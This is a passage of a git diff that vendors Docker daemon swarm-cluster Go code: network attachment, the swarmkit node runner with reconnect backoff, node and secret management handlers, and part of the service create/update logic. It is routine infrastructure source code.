*network.NetworkingConfig) + detachWaitCh := make(chan struct{}) + attachCompleteCh := make(chan struct{}) + c.attachers[aKey] = &attacher{ + attachWaitCh: attachWaitCh, + attachCompleteCh: attachCompleteCh, + detachWaitCh: detachWaitCh, + } + c.mu.Unlock() + + ctx, cancel := c.getRequestContext() + defer cancel() + + taskID, err := agent.ResourceAllocator().AttachNetwork(ctx, containerID, target, addresses) + if err != nil { + c.mu.Lock() + delete(c.attachers, aKey) + c.mu.Unlock() + return nil, fmt.Errorf("Could not attach to network %s: %v", target, err) + } + + c.mu.Lock() + c.attachers[aKey].taskID = taskID + close(attachCompleteCh) + c.mu.Unlock() + + logrus.Debugf("Successfully attached to network %s with task id %s", target, taskID) + + release := func() { + ctx, cancel := c.getRequestContext() + defer cancel() + if err := agent.ResourceAllocator().DetachNetwork(ctx, taskID); err != nil { + logrus.Errorf("Failed remove network attachment %s to network %s on allocation failure: %v", + taskID, target, err) + } + } + + var config *network.NetworkingConfig + select { + case config = <-attachWaitCh: + case <-ctx.Done(): + release() + return nil, fmt.Errorf("attaching to network failed, make sure your network options are correct and check manager logs: %v", ctx.Err()) + } + + c.mu.Lock() + c.attachers[aKey].config = config + c.mu.Unlock() + + logrus.Debugf("Successfully allocated resources on network %s for task id %s", target, taskID) + + return config, nil +} + +// DetachNetwork unblocks the waiters waiting on WaitForDetachment so +// that a request to detach can be generated towards the manager. +func (c *Cluster) DetachNetwork(target string, containerID string) error { + aKey := attacherKey(target, containerID) + + c.mu.Lock() + attacher, ok := c.attachers[aKey] + delete(c.attachers, aKey) + c.mu.Unlock() + + if !ok { + return fmt.Errorf("could not find network attachment for container %s to network %s", containerID, target) + } + + close(attacher.detachWaitCh) + return nil +} + +// CreateNetwork creates a new cluster managed network. +func (c *Cluster) CreateNetwork(s apitypes.NetworkCreateRequest) (string, error) { + if runconfig.IsPreDefinedNetwork(s.Name) { + err := notAllowedError(fmt.Sprintf("%s is a pre-defined network and cannot be created", s.Name)) + return "", errors.WithStack(err) + } + + var resp *swarmapi.CreateNetworkResponse + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + networkSpec := convert.BasicNetworkCreateToGRPC(s) + r, err := state.controlClient.CreateNetwork(ctx, &swarmapi.CreateNetworkRequest{Spec: &networkSpec}) + if err != nil { + return err + } + resp = r + return nil + }); err != nil { + return "", err + } + + return resp.Network.ID, nil +} + +// RemoveNetwork removes a cluster network. +func (c *Cluster) RemoveNetwork(input string) error { + return c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + network, err := getNetwork(ctx, state.controlClient, input) + if err != nil { + return err + } + + _, err = state.controlClient.RemoveNetwork(ctx, &swarmapi.RemoveNetworkRequest{NetworkID: network.ID}) + return err + }) +} + +func (c *Cluster) populateNetworkID(ctx context.Context, client swarmapi.ControlClient, s *types.ServiceSpec) error { + // Always prefer NetworkAttachmentConfigs from TaskTemplate + // but fallback to service spec for backward compatibility + networks := s.TaskTemplate.Networks + if len(networks) == 0 { + networks = s.Networks + } + for i, n := range networks { + apiNetwork, err := getNetwork(ctx, client, n.Target) + if err != nil { + ln, _ := c.config.Backend.FindNetwork(n.Target) + if ln != nil && runconfig.IsPreDefinedNetwork(ln.Name()) { + // Need to retrieve the corresponding predefined swarm network + // and use its id for the request. + apiNetwork, err = getNetwork(ctx, client, ln.Name()) + if err != nil { + return errors.Wrap(errdefs.NotFound(err), "could not find the corresponding predefined swarm network") + } + goto setid + } + if ln != nil && !ln.Info().Dynamic() { + errMsg := fmt.Sprintf("The network %s cannot be used with services. Only networks scoped to the swarm can be used, such as those created with the overlay driver.", ln.Name()) + return errors.WithStack(notAllowedError(errMsg)) + } + return err + } + setid: + networks[i].Target = apiNetwork.ID + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/noderunner.go b/vendor/github.com/docker/docker/daemon/cluster/noderunner.go new file mode 100644 index 0000000000..87e65aaead --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/noderunner.go @@ -0,0 +1,388 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +import ( + "context" + "fmt" + "path/filepath" + "runtime" + "strings" + "sync" + "time" + + types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/executor/container" + lncluster "github.com/docker/libnetwork/cluster" + swarmapi "github.com/docker/swarmkit/api" + swarmnode "github.com/docker/swarmkit/node" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "google.golang.org/grpc" + "google.golang.org/grpc/codes" + "google.golang.org/grpc/status" +) + +// nodeRunner implements a manager for continuously running swarmkit node, restarting them with backoff delays if needed. +type nodeRunner struct { + nodeState + mu sync.RWMutex + done chan struct{} // closed when swarmNode exits + ready chan struct{} // closed when swarmNode becomes active + reconnectDelay time.Duration + config nodeStartConfig + + repeatedRun bool + cancelReconnect func() + stopping bool + cluster *Cluster // only for accessing config helpers, never call any methods. TODO: change to config struct +} + +// nodeStartConfig holds configuration needed to start a new node. Exported +// fields of this structure are saved to disk in json. Unexported fields +// contain data that shouldn't be persisted between daemon reloads. +type nodeStartConfig struct { + // LocalAddr is this machine's local IP or hostname, if specified. + LocalAddr string + // RemoteAddr is the address that was given to "swarm join". It is used + // to find LocalAddr if necessary. + RemoteAddr string + // ListenAddr is the address we bind to, including a port. + ListenAddr string + // AdvertiseAddr is the address other nodes should connect to, + // including a port. + AdvertiseAddr string + // DataPathAddr is the address that has to be used for the data path + DataPathAddr string + // JoinInProgress is set to true if a join operation has started, but + // not completed yet. + JoinInProgress bool + + joinAddr string + forceNewCluster bool + joinToken string + lockKey []byte + autolock bool + availability types.NodeAvailability +} + +func (n *nodeRunner) Ready() chan error { + c := make(chan error, 1) + n.mu.RLock() + ready, done := n.ready, n.done + n.mu.RUnlock() + go func() { + select { + case <-ready: + case <-done: + } + select { + case <-ready: + default: + n.mu.RLock() + c <- n.err + n.mu.RUnlock() + } + close(c) + }() + return c +} + +func (n *nodeRunner) Start(conf nodeStartConfig) error { + n.mu.Lock() + defer n.mu.Unlock() + + n.reconnectDelay = initialReconnectDelay + + return n.start(conf) +} + +func (n *nodeRunner) start(conf nodeStartConfig) error { + var control string + if runtime.GOOS == "windows" { + control = `\\.\pipe\` + controlSocket + } else { + control = filepath.Join(n.cluster.runtimeRoot, controlSocket) + } + + joinAddr := conf.joinAddr + if joinAddr == "" && conf.JoinInProgress { + // We must have been restarted while trying to join a cluster. + // Continue trying to join instead of forming our own cluster. + joinAddr = conf.RemoteAddr + } + + // Hostname is not set here. Instead, it is obtained from + // the node description that is reported periodically + swarmnodeConfig := swarmnode.Config{ + ForceNewCluster: conf.forceNewCluster, + ListenControlAPI: control, + ListenRemoteAPI: conf.ListenAddr, + AdvertiseRemoteAPI: conf.AdvertiseAddr, + JoinAddr: joinAddr, + StateDir: n.cluster.root, + JoinToken: conf.joinToken, + Executor: container.NewExecutor( + n.cluster.config.Backend, + n.cluster.config.PluginBackend, + n.cluster.config.ImageBackend, + n.cluster.config.VolumeBackend, + ), + HeartbeatTick: n.cluster.config.RaftHeartbeatTick, + // Recommended value in etcd/raft is 10 x (HeartbeatTick). + // Lower values were seen to have caused instability because of + // frequent leader elections when running on flakey networks. + ElectionTick: n.cluster.config.RaftElectionTick, + UnlockKey: conf.lockKey, + AutoLockManagers: conf.autolock, + PluginGetter: n.cluster.config.Backend.PluginGetter(), + } + if conf.availability != "" { + avail, ok := swarmapi.NodeSpec_Availability_value[strings.ToUpper(string(conf.availability))] + if !ok { + return fmt.Errorf("invalid Availability: %q", conf.availability) + } + swarmnodeConfig.Availability = swarmapi.NodeSpec_Availability(avail) + } + node, err := swarmnode.New(&swarmnodeConfig) + if err != nil { + return err + } + if err := node.Start(context.Background()); err != nil { + return err + } + + n.done = make(chan struct{}) + n.ready = make(chan struct{}) + n.swarmNode = node + if conf.joinAddr != "" { + conf.JoinInProgress = true + } + n.config = conf + savePersistentState(n.cluster.root, conf) + + ctx, cancel := context.WithCancel(context.Background()) + + go func() { + n.handleNodeExit(node) + cancel() + }() + + go n.handleReadyEvent(ctx, node, n.ready) + go n.handleControlSocketChange(ctx, node) + + return nil +} + +func (n *nodeRunner) handleControlSocketChange(ctx context.Context, node *swarmnode.Node) { + for conn := range node.ListenControlSocket(ctx) { + n.mu.Lock() + if n.grpcConn != conn { + if conn == nil { + n.controlClient = nil + n.logsClient = nil + } else { + n.controlClient = swarmapi.NewControlClient(conn) + n.logsClient = swarmapi.NewLogsClient(conn) + // push store changes to daemon + go n.watchClusterEvents(ctx, conn) + } + } + n.grpcConn = conn + n.mu.Unlock() + n.cluster.SendClusterEvent(lncluster.EventSocketChange) + } +} + +func (n *nodeRunner) watchClusterEvents(ctx context.Context, conn *grpc.ClientConn) { + client := swarmapi.NewWatchClient(conn) + watch, err := client.Watch(ctx, &swarmapi.WatchRequest{ + Entries: []*swarmapi.WatchRequest_WatchEntry{ + { + Kind: "node", + Action: swarmapi.WatchActionKindCreate | swarmapi.WatchActionKindUpdate | swarmapi.WatchActionKindRemove, + }, + { + Kind: "service", + Action: swarmapi.WatchActionKindCreate | swarmapi.WatchActionKindUpdate | swarmapi.WatchActionKindRemove, + }, + { + Kind: "network", + Action: swarmapi.WatchActionKindCreate | swarmapi.WatchActionKindUpdate | swarmapi.WatchActionKindRemove, + }, + { + Kind: "secret", + Action: swarmapi.WatchActionKindCreate | swarmapi.WatchActionKindUpdate | swarmapi.WatchActionKindRemove, + }, + { + Kind: "config", + Action: swarmapi.WatchActionKindCreate | swarmapi.WatchActionKindUpdate | swarmapi.WatchActionKindRemove, + }, + }, + IncludeOldObject: true, + }) + if err != nil { + logrus.WithError(err).Error("failed to watch cluster store") + return + } + for { + msg, err := watch.Recv() + if err != nil { + // store watch is broken + errStatus, ok := status.FromError(err) + if !ok || errStatus.Code() != codes.Canceled { + logrus.WithError(err).Error("failed to receive changes from store watch API") + } + return + } + select { + case <-ctx.Done(): + return + case n.cluster.watchStream <- msg: + } + } +} + +func (n *nodeRunner) handleReadyEvent(ctx context.Context, node *swarmnode.Node, ready chan struct{}) { + select { + case <-node.Ready(): + n.mu.Lock() + n.err = nil + if n.config.JoinInProgress { + n.config.JoinInProgress = false + savePersistentState(n.cluster.root, n.config) + } + n.mu.Unlock() + close(ready) + case <-ctx.Done(): + } + n.cluster.SendClusterEvent(lncluster.EventNodeReady) +} + +func (n *nodeRunner) handleNodeExit(node *swarmnode.Node) { + err := detectLockedError(node.Err(context.Background())) + if err != nil { + logrus.Errorf("cluster exited with error: %v", err) + } + n.mu.Lock() + n.swarmNode = nil + n.err = err + close(n.done) + select { + case <-n.ready: + n.enableReconnectWatcher() + default: + if n.repeatedRun { + n.enableReconnectWatcher() + } + } + n.repeatedRun = true + n.mu.Unlock() +} + +// Stop stops the current swarm node if it is running. +func (n *nodeRunner) Stop() error { + n.mu.Lock() + if n.cancelReconnect != nil { // between restarts + n.cancelReconnect() + n.cancelReconnect = nil + } + if n.swarmNode == nil { + n.mu.Unlock() + return nil + } + n.stopping = true + ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second) + defer cancel() + n.mu.Unlock() + if err := n.swarmNode.Stop(ctx); err != nil && !strings.Contains(err.Error(), "context canceled") { + return err + } + n.cluster.SendClusterEvent(lncluster.EventNodeLeave) + <-n.done + return nil +} + +func (n *nodeRunner) State() nodeState { + if n == nil { + return nodeState{status: types.LocalNodeStateInactive} + } + n.mu.RLock() + defer n.mu.RUnlock() + + ns := n.nodeState + + if ns.err != nil || n.cancelReconnect != nil { + if errors.Cause(ns.err) == errSwarmLocked { + ns.status = types.LocalNodeStateLocked + } else { + ns.status = types.LocalNodeStateError + } + } else { + select { + case <-n.ready: + ns.status = types.LocalNodeStateActive + default: + ns.status = types.LocalNodeStatePending + } + } + + return ns +} + +func (n *nodeRunner) enableReconnectWatcher() { + if n.stopping { + return + } + n.reconnectDelay *= 2 + if n.reconnectDelay > maxReconnectDelay { + n.reconnectDelay = maxReconnectDelay + } + logrus.Warnf("Restarting swarm in %.2f seconds", n.reconnectDelay.Seconds()) + delayCtx, cancel := context.WithTimeout(context.Background(), n.reconnectDelay) + n.cancelReconnect = cancel + + go func() { + <-delayCtx.Done() + if delayCtx.Err() != context.DeadlineExceeded { + return + } + n.mu.Lock() + defer n.mu.Unlock() + if n.stopping { + return + } + + if err := n.start(n.config); err != nil { + n.err = err + } + }() +} + +// nodeState represents information about the current state of the cluster and +// provides access to the grpc clients. +type nodeState struct { + swarmNode *swarmnode.Node + grpcConn *grpc.ClientConn + controlClient swarmapi.ControlClient + logsClient swarmapi.LogsClient + status types.LocalNodeState + actualLocalAddr string + err error +} + +// IsActiveManager returns true if node is a manager ready to accept control requests. It is safe to access the client properties if this returns true. +func (ns nodeState) IsActiveManager() bool { + return ns.controlClient != nil +} + +// IsManager returns true if node is a manager. +func (ns nodeState) IsManager() bool { + return ns.swarmNode != nil && ns.swarmNode.Manager() != nil +} + +// NodeID returns node's ID or empty string if node is inactive. +func (ns nodeState) NodeID() string { + if ns.swarmNode != nil { + return ns.swarmNode.NodeID() + } + return "" +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/nodes.go b/vendor/github.com/docker/docker/daemon/cluster/nodes.go new file mode 100644 index 0000000000..3c073b0bac --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/nodes.go @@ -0,0 +1,105 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +import ( + "context" + + apitypes "github.com/docker/docker/api/types" + types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/convert" + "github.com/docker/docker/errdefs" + swarmapi "github.com/docker/swarmkit/api" +) + +// GetNodes returns a list of all nodes known to a cluster. +func (c *Cluster) GetNodes(options apitypes.NodeListOptions) ([]types.Node, error) { + c.mu.RLock() + defer c.mu.RUnlock() + + state := c.currentNodeState() + if !state.IsActiveManager() { + return nil, c.errNoManager(state) + } + + filters, err := newListNodesFilters(options.Filters) + if err != nil { + return nil, err + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := state.controlClient.ListNodes( + ctx, + &swarmapi.ListNodesRequest{Filters: filters}) + if err != nil { + return nil, err + } + + nodes := make([]types.Node, 0, len(r.Nodes)) + + for _, node := range r.Nodes { + nodes = append(nodes, convert.NodeFromGRPC(*node)) + } + return nodes, nil +} + +// GetNode returns a node based on an ID. +func (c *Cluster) GetNode(input string) (types.Node, error) { + var node *swarmapi.Node + + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + n, err := getNode(ctx, state.controlClient, input) + if err != nil { + return err + } + node = n + return nil + }); err != nil { + return types.Node{}, err + } + + return convert.NodeFromGRPC(*node), nil +} + +// UpdateNode updates existing nodes properties. +func (c *Cluster) UpdateNode(input string, version uint64, spec types.NodeSpec) error { + return c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + nodeSpec, err := convert.NodeSpecToGRPC(spec) + if err != nil { + return errdefs.InvalidParameter(err) + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + currentNode, err := getNode(ctx, state.controlClient, input) + if err != nil { + return err + } + + _, err = state.controlClient.UpdateNode( + ctx, + &swarmapi.UpdateNodeRequest{ + NodeID: currentNode.ID, + Spec: &nodeSpec, + NodeVersion: &swarmapi.Version{ + Index: version, + }, + }, + ) + return err + }) +} + +// RemoveNode removes a node from a cluster +func (c *Cluster) RemoveNode(input string, force bool) error { + return c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + node, err := getNode(ctx, state.controlClient, input) + if err != nil { + return err + } + + _, err = state.controlClient.RemoveNode(ctx, &swarmapi.RemoveNodeRequest{NodeID: node.ID, Force: force}) + return err + }) +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/provider/network.go b/vendor/github.com/docker/docker/daemon/cluster/provider/network.go index f4c72ae13b..533baa0e17 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/provider/network.go +++ b/vendor/github.com/docker/docker/daemon/cluster/provider/network.go @@ -1,4 +1,4 @@ -package provider +package provider // import "github.com/docker/docker/daemon/cluster/provider" import "github.com/docker/docker/api/types" diff --git a/vendor/github.com/docker/docker/daemon/cluster/secrets.go b/vendor/github.com/docker/docker/daemon/cluster/secrets.go index 2b9eb5da1d..c6fd842081 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/secrets.go +++ b/vendor/github.com/docker/docker/daemon/cluster/secrets.go @@ -1,6 +1,8 @@ -package cluster +package cluster // import "github.com/docker/docker/daemon/cluster" import ( + "context" + apitypes "github.com/docker/docker/api/types" types "github.com/docker/docker/api/types/swarm" "github.com/docker/docker/daemon/cluster/convert" @@ -8,32 +10,30 @@ import ( ) // GetSecret returns a secret from a managed swarm cluster -func (c *Cluster) GetSecret(id string) (types.Secret, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return types.Secret{}, c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - r, err := c.node.client.GetSecret(ctx, &swarmapi.GetSecretRequest{SecretID: id}) - if err != nil { +func (c *Cluster) GetSecret(input string) (types.Secret, error) { + var secret *swarmapi.Secret + + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + s, err := getSecret(ctx, state.controlClient, input) + if err != nil { + return err + } + secret = s + return nil + }); err != nil { return types.Secret{}, err } - - return convert.SecretFromGRPC(r.Secret), nil + return convert.SecretFromGRPC(secret), nil } // GetSecrets returns all secrets of a managed swarm cluster. func (c *Cluster) GetSecrets(options apitypes.SecretListOptions) ([]types.Secret, error) { - c.RLock() - defer c.RUnlock() + c.mu.RLock() + defer c.mu.RUnlock() - if !c.isActiveManager() { - return nil, c.errNoManager() + state := c.currentNodeState() + if !state.IsActiveManager() { + return nil, c.errNoManager(state) } filters, err := newListSecretsFilters(options.Filters) @@ -43,13 +43,13 @@ func (c *Cluster) GetSecrets(options apitypes.SecretListOptions) ([]types.Secret ctx, cancel := c.getRequestContext() defer cancel() - r, err := c.node.client.ListSecrets(ctx, + r, err := state.controlClient.ListSecrets(ctx, &swarmapi.ListSecretsRequest{Filters: filters}) if err != nil { return nil, err } - secrets := []types.Secret{} + secrets := make([]types.Secret, 0, len(r.Secrets)) for _, secret := range r.Secrets { secrets = append(secrets, convert.SecretFromGRPC(secret)) @@ -60,74 +60,59 @@ func (c *Cluster) GetSecrets(options apitypes.SecretListOptions) ([]types.Secret // CreateSecret creates a new secret in a managed swarm cluster. func (c *Cluster) CreateSecret(s types.SecretSpec) (string, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return "", c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - secretSpec := convert.SecretSpecToGRPC(s) - - r, err := c.node.client.CreateSecret(ctx, - &swarmapi.CreateSecretRequest{Spec: &secretSpec}) - if err != nil { + var resp *swarmapi.CreateSecretResponse + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + secretSpec := convert.SecretSpecToGRPC(s) + + r, err := state.controlClient.CreateSecret(ctx, + &swarmapi.CreateSecretRequest{Spec: &secretSpec}) + if err != nil { + return err + } + resp = r + return nil + }); err != nil { return "", err } - - return r.Secret.ID, nil + return resp.Secret.ID, nil } // RemoveSecret removes a secret from a managed swarm cluster. -func (c *Cluster) RemoveSecret(id string) error { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - req := &swarmapi.RemoveSecretRequest{ - SecretID: id, - } - - if _, err := c.node.client.RemoveSecret(ctx, req); err != nil { +func (c *Cluster) RemoveSecret(input string) error { + return c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + secret, err := getSecret(ctx, state.controlClient, input) + if err != nil { + return err + } + + req := &swarmapi.RemoveSecretRequest{ + SecretID: secret.ID, + } + + _, err = state.controlClient.RemoveSecret(ctx, req) return err - } - return nil + }) } // UpdateSecret updates a secret in a managed swarm cluster. // Note: this is not exposed to the CLI but is available from the API only -func (c *Cluster) UpdateSecret(id string, version uint64, spec types.SecretSpec) error { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - secretSpec := convert.SecretSpecToGRPC(spec) - - if _, err := c.client.UpdateSecret(ctx, - &swarmapi.UpdateSecretRequest{ - SecretID: id, - SecretVersion: &swarmapi.Version{ - Index: version, - }, - Spec: &secretSpec, - }); err != nil { +func (c *Cluster) UpdateSecret(input string, version uint64, spec types.SecretSpec) error { + return c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + secret, err := getSecret(ctx, state.controlClient, input) + if err != nil { + return err + } + + secretSpec := convert.SecretSpecToGRPC(spec) + + _, err = state.controlClient.UpdateSecret(ctx, + &swarmapi.UpdateSecretRequest{ + SecretID: secret.ID, + SecretVersion: &swarmapi.Version{ + Index: version, + }, + Spec: &secretSpec, + }) return err - } - - return nil + }) } diff --git a/vendor/github.com/docker/docker/daemon/cluster/services.go b/vendor/github.com/docker/docker/daemon/cluster/services.go new file mode 100644 index 0000000000..c14037645c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/services.go @@ -0,0 +1,602 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +import ( + "context" + "encoding/base64" + "encoding/json" + "fmt" + "io" + "os" + "strconv" + "strings" + "time" + + "github.com/docker/distribution/reference" + apitypes "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + types "github.com/docker/docker/api/types/swarm" + timetypes "github.com/docker/docker/api/types/time" + "github.com/docker/docker/daemon/cluster/convert" + "github.com/docker/docker/errdefs" + runconfigopts "github.com/docker/docker/runconfig/opts" + swarmapi "github.com/docker/swarmkit/api" + gogotypes "github.com/gogo/protobuf/types" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +// GetServices returns all services of a managed swarm cluster. +func (c *Cluster) GetServices(options apitypes.ServiceListOptions) ([]types.Service, error) { + c.mu.RLock() + defer c.mu.RUnlock() + + state := c.currentNodeState() + if !state.IsActiveManager() { + return nil, c.errNoManager(state) + } + + // We move the accepted filter check here as "mode" filter + // is processed in the daemon, not in SwarmKit. So it might + // be good to have accepted file check in the same file as + // the filter processing (in the for loop below). + accepted := map[string]bool{ + "name": true, + "id": true, + "label": true, + "mode": true, + "runtime": true, + } + if err := options.Filters.Validate(accepted); err != nil { + return nil, err + } + + if len(options.Filters.Get("runtime")) == 0 { + // Default to using the container runtime filter + options.Filters.Add("runtime", string(types.RuntimeContainer)) + } + + filters := &swarmapi.ListServicesRequest_Filters{ + NamePrefixes: options.Filters.Get("name"), + IDPrefixes: options.Filters.Get("id"), + Labels: runconfigopts.ConvertKVStringsToMap(options.Filters.Get("label")), + Runtimes: options.Filters.Get("runtime"), + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := state.controlClient.ListServices( + ctx, + &swarmapi.ListServicesRequest{Filters: filters}) + if err != nil { + return nil, err + } + + services := make([]types.Service, 0, len(r.Services)) + + for _, service := range r.Services { + if options.Filters.Contains("mode") { + var mode string + switch service.Spec.GetMode().(type) { + case *swarmapi.ServiceSpec_Global: + mode = "global" + case *swarmapi.ServiceSpec_Replicated: + mode = "replicated" + } + + if !options.Filters.ExactMatch("mode", mode) { + continue + } + } + svcs, err := convert.ServiceFromGRPC(*service) + if err != nil { + return nil, err + } + services = append(services, svcs) + } + + return services, nil +} + +// GetService returns a service based on an ID or name. +func (c *Cluster) GetService(input string, insertDefaults bool) (types.Service, error) { + var service *swarmapi.Service + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + s, err := getService(ctx, state.controlClient, input, insertDefaults) + if err != nil { + return err + } + service = s + return nil + }); err != nil { + return types.Service{}, err + } + svc, err := convert.ServiceFromGRPC(*service) + if err != nil { + return types.Service{}, err + } + return svc, nil +} + +// CreateService creates a new service in a managed swarm cluster. +func (c *Cluster) CreateService(s types.ServiceSpec, encodedAuth string, queryRegistry bool) (*apitypes.ServiceCreateResponse, error) { + var resp *apitypes.ServiceCreateResponse + err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + err := c.populateNetworkID(ctx, state.controlClient, &s) + if err != nil { + return err + } + + serviceSpec, err := convert.ServiceSpecToGRPC(s) + if err != nil { + return errdefs.InvalidParameter(err) + } + + resp = &apitypes.ServiceCreateResponse{} + + switch serviceSpec.Task.Runtime.(type) { + case *swarmapi.TaskSpec_Attachment: + return fmt.Errorf("invalid task spec: spec type %q not supported", types.RuntimeNetworkAttachment) + // handle other runtimes here + case *swarmapi.TaskSpec_Generic: + switch serviceSpec.Task.GetGeneric().Kind { + case string(types.RuntimePlugin): + info, _ := c.config.Backend.SystemInfo() + if !info.ExperimentalBuild { + return fmt.Errorf("runtime type %q only supported in experimental", types.RuntimePlugin) + } + if s.TaskTemplate.PluginSpec == nil { + return errors.New("plugin spec must be set") + } + + default: + return fmt.Errorf("unsupported runtime type: %q", serviceSpec.Task.GetGeneric().Kind) + } + + r, err := state.controlClient.CreateService(ctx, &swarmapi.CreateServiceRequest{Spec: &serviceSpec}) + if err != nil { + return err + } + + resp.ID = r.Service.ID + case *swarmapi.TaskSpec_Container: + ctnr := serviceSpec.Task.GetContainer() + if ctnr == nil { + return errors.New("service does not use container tasks") + } + if encodedAuth != "" { + ctnr.PullOptions = &swarmapi.ContainerSpec_PullOptions{RegistryAuth: encodedAuth} + } + + // retrieve auth config from encoded auth + authConfig := &apitypes.AuthConfig{} + if encodedAuth != "" { + authReader := strings.NewReader(encodedAuth) + dec := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, authReader)) + if err := dec.Decode(authConfig); err != nil { + logrus.Warnf("invalid authconfig: %v", err) + } + } + + // pin image by digest for API versions < 1.30 + // TODO(nishanttotla): The check on "DOCKER_SERVICE_PREFER_OFFLINE_IMAGE" + // should be removed in the future. Since integration tests only use the + // latest API version, so this is no longer required. + if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" && queryRegistry { + digestImage, err := c.imageWithDigestString(ctx, ctnr.Image, authConfig) + if err != nil { + logrus.Warnf("unable to pin image %s to digest: %s", ctnr.Image, err.Error()) + // warning in the client response should be concise + resp.Warnings = append(resp.Warnings, digestWarning(ctnr.Image)) + + } else if ctnr.Image != digestImage { + logrus.Debugf("pinning image %s by digest: %s", ctnr.Image, digestImage) + ctnr.Image = digestImage + + } else { + logrus.Debugf("creating service using supplied digest reference %s", ctnr.Image) + + } + + // Replace the context with a fresh one. + // If we timed out while communicating with the + // registry, then "ctx" will already be expired, which + // would cause UpdateService below to fail. Reusing + // "ctx" could make it impossible to create a service + // if the registry is slow or unresponsive. + var cancel func() + ctx, cancel = c.getRequestContext() + defer cancel() + } + + r, err := state.controlClient.CreateService(ctx, &swarmapi.CreateServiceRequest{Spec: &serviceSpec}) + if err != nil { + return err + } + + resp.ID = r.Service.ID + } + return nil + }) + + return resp, err +} + +// UpdateService updates existing service to match new properties. +func (c *Cluster) UpdateService(serviceIDOrName string, version uint64, spec types.ServiceSpec, flags apitypes.ServiceUpdateOptions, queryRegistry bool) (*apitypes.ServiceUpdateResponse, error) { + var resp *apitypes.ServiceUpdateResponse + + err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + + err := c.populateNetworkID(ctx, state.controlClient, &spec) + if err != nil { + return err + } + + serviceSpec, err := convert.ServiceSpecToGRPC(spec) + if err != nil { + return errdefs.InvalidParameter(err) + } + + currentService, err := getService(ctx, state.controlClient, serviceIDOrName, false) + if err != nil { + return err + } + + resp = &apitypes.ServiceUpdateResponse{} + + switch serviceSpec.Task.Runtime.(type) { + case *swarmapi.TaskSpec_Attachment: + return fmt.Errorf("invalid task spec: spec type %q not supported", types.RuntimeNetworkAttachment) + case *swarmapi.TaskSpec_Generic: + switch serviceSpec.Task.GetGeneric().Kind { + case string(types.RuntimePlugin): + if spec.TaskTemplate.PluginSpec == nil { + return errors.New("plugin spec must be set") + } + } + case *swarmapi.TaskSpec_Container: + newCtnr := serviceSpec.Task.GetContainer() + if newCtnr == nil { + return errors.New("service does not use container tasks") + } + + encodedAuth := flags.EncodedRegistryAuth + if encodedAuth != "" { + newCtnr.PullOptions = &swarmapi.ContainerSpec_PullOptions{RegistryAuth: encodedAuth} + } else { + // this is needed because if the encodedAuth isn't being updated then we + // shouldn't lose it, and continue to use the one that was already present + var ctnr *swarmapi.ContainerSpec + switch flags.RegistryAuthFrom { + case apitypes.RegistryAuthFromSpec, "": + ctnr = currentService.Spec.Task.GetContainer() + case apitypes.RegistryAuthFromPreviousSpec: + if currentService.PreviousSpec == nil { + return errors.New("service does not have a previous spec") + } + ctnr = currentService.PreviousSpec.Task.GetContainer() + default: + return errors.New("unsupported registryAuthFrom value") + } + if ctnr == nil { + return errors.New("service does not use container tasks") + } + newCtnr.PullOptions = ctnr.PullOptions + // update encodedAuth so it can be used to pin image by digest + if ctnr.PullOptions != nil { + encodedAuth = ctnr.PullOptions.RegistryAuth + } + } + + // retrieve auth config from encoded auth + authConfig := &apitypes.AuthConfig{} + if encodedAuth != "" { + if err := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, strings.NewReader(encodedAuth))).Decode(authConfig); err != nil { + logrus.Warnf("invalid authconfig: %v", err) + } + } + + // pin image by digest for API versions < 1.30 + // TODO(nishanttotla): The check on "DOCKER_SERVICE_PREFER_OFFLINE_IMAGE" + // should be removed in the future. Since integration tests only use the + // latest API version, so this is no longer required. + if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" && queryRegistry { + digestImage, err := c.imageWithDigestString(ctx, newCtnr.Image, authConfig) + if err != nil { + logrus.Warnf("unable to pin image %s to digest: %s", newCtnr.Image, err.Error()) + // warning in the client response should be concise + resp.Warnings = append(resp.Warnings, digestWarning(newCtnr.Image)) + } else if 